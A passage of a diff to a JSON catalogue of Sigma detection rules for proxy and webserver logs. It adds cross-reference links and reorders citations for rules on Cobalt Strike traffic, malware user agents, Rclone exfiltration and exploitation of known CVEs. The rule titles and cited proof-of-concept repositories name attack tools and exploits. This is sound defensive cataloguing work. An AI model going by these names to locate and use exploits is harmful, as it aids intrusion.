}, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "value": "Exploit Framework User Agent" }, @@ -58459,6 +75348,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "value": "Windows WebDAV User Agent" }, @@ -58485,6 +75383,22 @@ "attack.t1568" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "value": "Download from Suspicious Dyndns Hosts" }, @@ -58510,6 +75424,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" }, @@ -58534,6 +75457,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", "value": "Suspicious User Agent" }, @@ -58551,8 +75483,8 @@ "logsource.product": "No established product", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" ], "tags": [ @@ -58562,6 +75494,22 @@ "attack.t1102.002" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b494b165-6634-483d-8c47-2026a6c52372", "value": "Telegram API Access" }, @@ -58588,8 +75536,24 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD" + "value": "Download From Suspicious TLD - Whitelist" }, { "description": "Detects suspicious user agent strings used by malware in proxy logs", @@ -58604,9 +75568,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" @@ -58616,6 +75580,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", "value": "Malware User Agent" }, @@ -58643,6 +75616,22 @@ "attack.s0190" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "value": "Bitsadmin to Uncommon IP Server Address" }, @@ -58659,8 +75648,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://rclone.org/", + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" ], "tags": [ @@ -58668,6 +75657,15 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", "value": "Rclone Activity via Proxy" }, @@ -58693,6 +75691,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797", "value": "Potential OWASSRF Exploitation Attempt - Proxy" }, @@ -58718,6 +75725,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", "value": "Crypto Miner User Agent" }, @@ -58769,6 +75785,36 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", "value": "iOS Implant URL Pattern" }, @@ -58794,6 +75840,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", "value": "CobaltStrike Malformed UAs in Malleable Profiles" }, @@ -58821,6 +75876,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "value": "Raw Paste Service Access" }, @@ -58846,6 +75924,15 @@ "attack.t1590" ] }, + "related": [ + { + "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "value": "Advanced IP/Port Scanner Update Check" }, @@ -58863,9 +75950,9 @@ "logsource.product": "No established product", "refs": [ "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://www.spamhaus.org/statistics/tlds/", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ @@ -58876,8 +75963,24 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD" + "value": "Download From Suspicious TLD - Blacklist" }, { "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", @@ -58915,8 +76018,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" ], "tags": [ @@ -58925,6 +76028,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" }, @@ -58951,6 +76063,29 @@ "attack.t1102.003" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "value": "PwnDrp Access" }, @@ -58976,6 +76111,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", "value": "CobaltStrike Malleable (OCSP) Profile" }, @@ -59002,6 +76146,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8557060-9221-4448-8794-96320e6f3e74", "value": "Windows PowerShell User Agent" }, @@ -59049,6 +76202,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", "value": "BabyShark Agent Pattern" }, @@ -59065,8 +76227,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" ], "tags": [ @@ -59076,6 +76238,15 @@ "attack.t1110" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", "value": "Hack Tool User Agent" }, @@ -59102,6 +76273,22 @@ "attack.t1567.002" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", "value": "APT40 Dropbox Tool User Agent" }, @@ -59130,6 +76317,22 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", "value": "Ursnif Malware C2 URL Pattern" }, @@ -59155,6 +76358,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", "value": "Empty User Agent" }, @@ -59183,6 +76395,22 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", "value": "Flash Player Update from Suspicious Location" }, @@ -59199,8 +76427,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://paper.seebug.org/1495/", "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" ], "tags": [ @@ -59209,6 +76437,15 @@ "cve.2021.21978" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", "value": "CVE-2021-21978 Exploitation Attempt" }, @@ -59226,8 +76463,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" ], "tags": [ @@ -59262,6 +76499,15 @@ "cve.2020.14882" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", "value": "Oracle WebLogic Exploit CVE-2020-14882" }, @@ -59278,10 +76524,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", - "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" ], "tags": [ @@ -59289,6 +76535,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38825179-3c78-4fed-b222-2e2166b926b1", "value": "Potential CVE-2021-26084 Exploitation Attempt" }, @@ -59313,6 +76568,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f55f047-112b-4101-ad32-43913f52db46", "value": "SonicWall SSL/VPN Jarrewrite Exploit" }, @@ -59338,6 +76602,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67bce556-312f-4c81-9162-c3c9ff2599b2", "value": "Exchange Exploitation Used by HAFNIUM" }, @@ -59354,8 +76627,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://www.anquanke.com/post/id/226029", + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml" ], "tags": [ @@ -59391,6 +76664,15 @@ "cve.2018.2894" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", "value": "Oracle WebLogic Exploit" }, @@ -59407,9 +76689,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", "https://dmaasland.github.io/posts/citrix.html", "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" ], "tags": [ @@ -59417,6 +76699,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" }, @@ -59433,8 +76724,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/search?q=CVE-2021-43798", "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" ], "tags": [ @@ -59442,6 +76733,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", "value": "Grafana Path Traversal Exploitation CVE-2021-43798" }, @@ -59480,10 +76780,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/Al1ex4/status/1382981479727128580", + "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/", "https://twitter.com/sec715/status/1373472323538362371", - "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186", - "https://twitter.com/Al1ex4/status/1382981479727128580", "https://github.com/murataydemir/CVE-2021-27905", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml" ], @@ -59493,6 +76793,15 @@ "cve.2021.27905" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bbcd74b-0596-41a4-94a0-4e88a76ffdb3", "value": "Potential CVE-2021-27905 Exploitation Attempt" }, @@ -59509,8 +76818,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://github.com/vnhacker1337/CVE-2022-27925-PoC", + "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/", "https://www.yang99.top/index.php/archives/82/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml" ], @@ -59520,6 +76829,15 @@ "cve.2022.27925" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd", "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE" }, @@ -59536,10 +76854,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/", - "https://twitter.com/_0xf4n9x_/status/1572052954538192901", "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/", + "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html", + "https://twitter.com/_0xf4n9x_/status/1572052954538192901", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml" ], "tags": [ @@ -59548,6 +76866,15 @@ "cve.2022.36804" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65c0a0ab-d675-4441-bd6b-d3db226a2685", "value": "Atlassian Bitbucket Command Injection Via Archive API" }, @@ -59566,10 +76893,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", "https://github.com/payloadbox/sql-injection-payload-list", "https://brightsec.com/blog/sql-injection-payloads/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml" ], "tags": "No established tags" @@ -59590,9 +76917,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_owassrf_poc_exploitation.yml" ], "tags": [ @@ -59600,6 +76927,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "92d78c63-5a5c-4c40-9b60-463810ffb082", "value": "OWASSRF Exploitation Attempt Using Public POC - Webserver" }, @@ -59626,6 +76962,15 @@ "cve.2021.26814" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", "value": "Exploitation of CVE-2021-26814 in Wazuh" }, @@ -59651,6 +76996,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "181f49fa-0b21-4665-a98c-a57025ebb8c7", "value": "Potential OWASSRF Exploitation Attempt - Webserver" }, @@ -59667,8 +77021,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml" ], "tags": [ @@ -59676,6 +77030,15 @@ "attack.t1499.004" ] }, + "related": [ + { + "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "59ec40bb-322e-40ab-808d-84fa690d7e56", "value": "Nginx Core Dump" }, @@ -59701,6 +77064,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" }, @@ -59726,6 +77098,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", "value": "CVE-2010-5278 Exploitation Attempt" }, @@ -59742,8 +77123,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml" ], "tags": [ @@ -59767,9 +77148,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://support.f5.com/csp/article/K52145254", "https://twitter.com/yorickkoster/status/1279709009151434754", "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://support.f5.com/csp/article/K52145254", "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" ], @@ -59778,6 +77159,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": 